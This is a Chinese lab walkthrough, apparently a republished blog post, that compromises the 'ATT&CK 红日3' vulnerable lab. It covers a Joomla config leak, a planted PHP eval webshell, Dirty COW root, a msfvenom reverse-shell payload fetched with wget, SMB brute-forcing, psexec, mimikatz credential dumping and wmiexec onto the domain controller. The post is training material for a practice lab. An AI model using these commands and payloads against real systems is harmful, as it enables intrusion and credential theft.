ATTCK红日3靶机渗透攻略

2023-10-21 07:10

本文主要是介绍ATTCK红日3靶机渗透攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

ATT&CK红队评估三攻略

下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

启动:直接恢复运行,不建议重启!注意由于靶场封装时桥接的ip可能跟当前IP段不一样,故而需要在centos靶机中输入 service network restart 重启网卡

信息收集

nmap扫描

nmap  -sS -sV 192.168.111.0/24开放了http80 ssh22 mysql3306

在这里插入图片描述

网站信息收集

在这里插入图片描述

通过wapplayzer插件可知 其cms为joomla 并且开启了nginx反向代理

cms扫描

使用joomscan进行扫描发现目录和joomla的版本号

joomscan -u http://192.168.111.132/

![image.png](https://img-blog.csdnimg.cn/img_convert/88a246b197b0f33882000fbb093d8914.png#align=left&display=inline&在这里插入图片描述

在这里插入图片描述

并且发现一个配置文件!

http://192.168.111.132/configuration.php~   
推测存在敏感信息泄露访问可得到数据库用户名密码  testuser   cvcvgjASD!@

在这里插入图片描述

mysql漏洞利用

链接mysql数据库

在这里插入图片描述

敏感信息收集

搜索users关键字发现对应的记录,密码被加密储存

在这里插入图片描述

百度搜索joomla官方文档

https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

在这里插入图片描述

得到官方给出的加密的的值替换原有的密码为433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT

登录后台

在这里插入图片描述

按照以下路径选择

在这里插入图片描述

在这里插入图片描述

在其中写入一句话木马

在这里插入图片描述

<?php@eval($_POST['123']);phpinfo();?>

访问/templates/beez3/muma.php

发现phpinfo成功解析

在这里插入图片描述

蚁剑链接一句话木马

成功getshell

在这里插入图片描述

但是无论执行什么都返回ret127,推测使用disable_functions函数在配置文件中禁用了部分命令

绕过disable_functions限制

使用蚁剑插件绕过即可

ssh登录

不绕过disable_functions也可

在/tmp/mysql/test.txt下发现一个账密

在这里插入图片描述

ssh登录成功

在这里插入图片描述

提权

uname -a
发现内核版本较低,2.*版本首先试试脏牛提权

在这里插入图片描述

kali开放http

在这里插入图片描述

靶机下载脏牛并执行,注意需要把/tmp/passwd.bak移走

在这里插入图片描述

su切换用户到firefart 12345。拥有root权限

在这里插入图片描述

内网横向

msf上线

msf创建linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.131 LPORT=9090 -f elf > msf.elf

在这里插入图片描述

python建立http

在这里插入图片描述

靶机下载木马,给予权限

[firefart@localhost tmp]# wget http://192.168.111.131:8080/msf.elf
[firefart@localhost tmp]# ls
dirty  dirty.c  msf.elf 
[firefart@localhost tmp]# chmod 777 msf.elf

msf设置监听

在这里插入图片描述

成功上线

在这里插入图片描述

发现内网网段

内网网段为 192.168.90.0/24

在这里插入图片描述

内网主机探活

添加内网网段路由

run autoroute -s 192.168.93.0/24

使用MSF的auxiliary/scanner/smb/smb_version模块扫内网的存活主机

在这里插入图片描述

等待一会

发现三台test域内主机,分别是win7 192.168.93.30/24、win2008 192.168.93.20/24、win2012 192.168.93.10/24

爆破smb密码

使用use auxiliary/scanner/smb/smb_login模块

use auxiliary/scanner/smb/smb_login
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
set rhosts 192.168.93.30
run

在这里插入图片描述

爆破出账密

在这里插入图片描述

192.168.93.30/192.168.93.20的密码都是 administrator 123qwe!ASD

通过smb登录192.168.93.30

msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec 
[*] Using configured payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.30
rhost => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run

在这里插入图片描述

发现域名test.org

在这里插入图片描述

域控为192.168.93.101

在这里插入图片描述

配置socks代理

在这里插入图片描述

使用wmi建立链接

WMI的全名为“Windows Management Instrumentation”。WMI是由一系列工具集组成的,可以在本地或者远程管理计算机系统。从Windows 98开始,Windows操作系统都支持WMI。利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中,同时攻击脚本无需写入到磁盘,具有极高的隐蔽性。

在这里插入图片描述

目标靶机拉取mimikatz

smbclient是基于SMB协议的,用于存取共享目标的客户端程序。

proxychains smbclient [//192.168.93.20/C ] ( / / 192.168.93.20 / C ](//192.168.93.20/C ](//192.168.93.20/C) -U administrator

put mimikatz.exe

在这里插入图片描述

WMI链接中可以看到mimikatz下载成功

在这里插入图片描述

mimikatz抓取内存密码

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” “exit” > log.log

在这里插入图片描述

拿到域控用户名密码为

Administrator

zxcASDqw123!!

在这里插入图片描述

登录域控

proxychains python3 wmiexec.py -debug ‘administrator:zxcASDqw123!!@192.168.93.10’

C:\users\administrator\Documents下拿到flag

在这里插入图片描述

这篇关于ATTCK红日3靶机渗透攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/252782

相关文章

大模型研发全揭秘:客服工单数据标注的完整攻略

在人工智能(AI)领域,数据标注是模型训练过程中至关重要的一步。无论你是新手还是有经验的从业者,掌握数据标注的技术细节和常见问题的解决方案都能为你的AI项目增添不少价值。在电信运营商的客服系统中,工单数据是客户问题和解决方案的重要记录。通过对这些工单数据进行有效标注,不仅能够帮助提升客服自动化系统的智能化水平,还能优化客户服务流程,提高客户满意度。本文将详细介绍如何在电信运营商客服工单的背景下进行

电脑桌面文件删除了怎么找回来?别急,快速恢复攻略在此

在日常使用电脑的过程中,我们经常会遇到这样的情况:一不小心,桌面上的某个重要文件被删除了。这时,大多数人可能会感到惊慌失措,不知所措。 其实,不必过于担心,因为有很多方法可以帮助我们找回被删除的桌面文件。下面,就让我们一起来了解一下这些恢复桌面文件的方法吧。 一、使用撤销操作 如果我们刚刚删除了桌面上的文件,并且还没有进行其他操作,那么可以尝试使用撤销操作来恢复文件。在键盘上同时按下“C

企业大模型落地的“最后一公里”攻略

一、大模型落地的行业现状与前景 大模型在多个行业展现出强大的应用潜力。在金融行业,沉淀了大量高质量数据,各金融平台用户数以亿计,交易数据浩如烟海。利用大模型分析处理这些数据,金融机构可以预测用户行为偏好,更高效、准确评估客户风险,实时监测交易和市场波动,及时制定策略。IDC 调研显示,超半数的金融机构计划在 2023 年投资生成式人工智能技术。 在科技领域,商汤人工智能大装置为大模型企业提

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

2025计算机毕业设计选题攻略

博主介绍:✌全网粉丝10W+,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业毕业设计项目实战6年之久,选择我们就是选择放心、选择安心毕业✌ 🍅由于篇幅限制,想要获取完整文章或者源码,或者代做,拉到文章底部即可看到个人VX。🍅 2023年 - 2024年 最新计算机毕业设计 本科 选题大全 汇总 计算机专业毕业设计之避坑指南(开题答辩选导师必看) 感兴趣的可以先收藏起来,还

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

2025届必备:如何打造Java SpringBoot大型超市数据处理系统,提升管理效率,最新攻略!

✍✍计算机编程指导师 ⭐⭐个人介绍:自己非常喜欢研究技术问题!专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目:有源码或者技术上的问题欢迎在评论区一起讨论交流! ⚡⚡ Java实战 | SpringBoot/SSM Python实战项目 | Django 微信小程序/安卓实战项目 大数据实战项目 ⚡⚡文末获取源码 文章目录